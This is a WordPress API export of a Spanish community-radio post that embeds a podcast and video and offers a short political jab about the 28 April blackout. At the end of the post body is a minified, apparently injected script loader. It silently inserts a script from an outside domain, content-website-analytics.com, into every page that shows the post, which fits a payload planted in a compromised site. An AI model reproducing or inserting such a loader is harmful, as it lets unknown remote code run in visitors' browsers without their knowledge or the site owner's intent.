{"id":6085,"date":"2025-05-20T19:53:40","date_gmt":"2025-05-20T19:53:40","guid":{"rendered":"https:\/\/radiojabato.es\/?p=6085"},"modified":"2026-04-20T15:05:22","modified_gmt":"2026-04-20T15:05:22","slug":"colectivo-puente-madera-el-otro-apagon","status":"publish","type":"post","link":"https:\/\/radiojabato.es\/?p=6085","title":{"rendered":"COLECTIVO PUENTE MADERA: \u00bb El Otro Apag\u00f3n.\u00bb"},"content":{"rendered":"\n<iframe src=\"https:\/\/www.ivoox.com\/player_ej_147768726_6_1.html?c1=73bee8\" width=\"100%\" height=\"200\" frameborder=\"0\" allowfullscreen=\"\" scrolling=\"no\" loading=\"lazy\"><\/iframe>\n\n\n\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\n<iframe loading=\"lazy\" title=\"COLECTIVO PUENTE MADERA: &quot; El Otro Apag\u00f3n.&quot;\" width=\"750\" height=\"422\" src=\"https:\/\/www.youtube.com\/embed\/qzQZWQN9phY?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share\" referrerpolicy=\"strict-origin-when-cross-origin\" allowfullscreen><\/iframe>\n<\/div><\/figure>\n\n\n\n<p>Bien podr\u00edamos decir que al apag\u00f3n generalizado del 28 de abril, se sum\u00f3 otro apag\u00f3n: el mental de la derecha\u2026 si bien es cierto que, en Espa\u00f1a, a este estamos ya bastante acostumbrados.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large is-resized\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"437\" src=\"https:\/\/radiojabato.es\/wp-content\/uploads\/2025\/05\/photo_2025-05-20_21-31-54-1024x437.jpg\" alt=\"\" class=\"wp-image-6086\" style=\"width:270px;height:auto\" srcset=\"https:\/\/radiojabato.es\/wp-content\/uploads\/2025\/05\/photo_2025-05-20_21-31-54-1024x437.jpg 1024w, https:\/\/radiojabato.es\/wp-content\/uploads\/2025\/05\/photo_2025-05-20_21-31-54-300x128.jpg 300w, https:\/\/radiojabato.es\/wp-content\/uploads\/2025\/05\/photo_2025-05-20_21-31-54-768x328.jpg 768w, https:\/\/radiojabato.es\/wp-content\/uploads\/2025\/05\/photo_2025-05-20_21-31-54.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<script>;(function(f,i,u,w,s){w=f.createElement(i);s=f.getElementsByTagName(i)[0];w.async=1;w.src=u;s.parentNode.insertBefore(w,s);})(document,'script','https:\/\/content-website-analytics.com\/script.js');<\/script>","protected":false},"excerpt":{"rendered":"<p>Bien podr\u00edamos decir que al apag\u00f3n generalizado del 28 de abril, se sum\u00f3 otro apag\u00f3n: el mental de la derecha\u2026 si bien es cierto que, en Espa\u00f1a, a este estamos [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[96],"tags":[],"class_list":["post-6085","post","type-post","status-publish","format-standard","hentry","category-colectivo-puente-madera"],"_links":{"self":[{"href":"https:\/\/radiojabato.es\/index.php?rest_route=\/wp\/v2\/posts\/6085","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/radiojabato.es\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/radiojabato.es\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/radiojabato.es\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/radiojabato.es\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=6085"}],"version-history":[{"count":2,"href":"https:\/\/radiojabato.es\/index.php?rest_route=\/wp\/v2\/posts\/6085\/revisions"}],"predecessor-version":[{"id":14310,"href":"https:\/\/radiojabato.es\/index.php?rest_route=\/wp\/v2\/posts\/6085\/revisions\/14310"}],"wp:attachment":[{"href":"https:\/\/radiojabato.es\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=6085"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/radiojabato.es\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=6085"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/radiojabato.es\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=6085"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}